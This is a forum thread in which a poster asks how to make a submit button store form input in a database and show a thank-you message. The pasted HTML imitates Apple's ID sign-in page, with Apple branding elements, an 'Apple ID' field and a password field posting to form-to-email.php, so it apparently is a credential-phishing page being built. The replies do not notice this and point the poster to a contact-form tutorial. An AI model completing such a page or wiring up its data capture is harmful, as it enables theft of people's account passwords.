Creating a specific php file

I am trying to find code that will connect my “submit” button on my site to myphpadmin so that when they click the button the info goes straight to my storage and a Thank you response replies on their screen. I am new to writing code and am slowly teaching myself–so I understand this is probably second nature to most of you. As it is like learning Japanese to me, can someone please provide me with the information I need assuming I know nothing.

I have my code written for my page which includes the submit button. How do I include code to have the content sent to my database?

Should my action not read “form to email?” Should it just read action=post?
What about action=get?

I copied some of the code from other sources as I learn which is why some things might not be necessary, but for my purposes at this moment it is functional other than being able to figure out how to get the information to me after the receiver pushes submit.

<!doctype html>
<html>
<body class="tk-body sf-ns-ui">
<div class="si-body si-container container-fluid" id="content" data-theme="lite">
  <apple-auth app-loading-defaults="{appLoadingDefaults}">
  <appleid-logo mode="{mode}">
    <div id="apple-id-logo" class="apple-id-logo hide-always"> <i aria-hidden="true" class="icon icon_apple"></i> </div>
  </appleid-logo>
  <div class="widget-container fade-in  restrict-max-wh  fade-in " data-mode="embed" data-isiebutnotedge="false">
  <div id="step" class="si-step ">
  <logo  {show-fade-in}="showFadeIn">
       <div class="logo   signin-label  fade-in">  </div>
</logo>
   <div id="stepEl" class="   ">
   <sign-in suppress-iforgot="{suppressIforgot}" {on-test-idp}="@_onTestIdp">
   <div class="signin fade-in" id="signin">
   <h1 tabindex="-1" class="si-container-title tk-intro "> Sign in to your account </h1>
<div class="container si-field-container    ">
<div class="no-gutter si-field apple-id">
<div class="col-xs-12"> <span class="sr-only" id="appleIdFieldLabel" aria-hidden="true">  </span>
 <div class="ax-border apple-id ">
<input type="text" id="appleId" can-field="accountName" autocomplete="off" autocorrect="off" autocapitalize="off" aria-required="true" required="required" aria-labelledby="appleIdFieldLabel" spellcheck="false" class="si-text-field form-textbox " placeholder="Full name">
 </div>
 </div>
 </div>
     <div class="field-separator "></div>
     <div class="no-gutter si-field pwd">
     <div class="col-xs-12">
                <label for="pwd" class="sr-only" aria-hidden="true"> </label>
              </div>
              <form method="post" action="form-to-email.php">
                <div class="ax-border Apple ID">
                  <input type="text" id="Apple ID" class="si-text-field form-textbox" placeholder="Password">
                </div>
                >
                <input type="submit" value="Submit" />
              </form>
</html>

Check that
http://blog.teamtreehouse.com/create-ajax-contact-form

Thank you. I haven’t tested this yet, but it seems like it is creating a new form rather than simply allowing me to set actions for the submit button. Do I need to recreate this entire portion of my html?

1 Like

I recommend that, instead of digging through what is missing :slight_smile: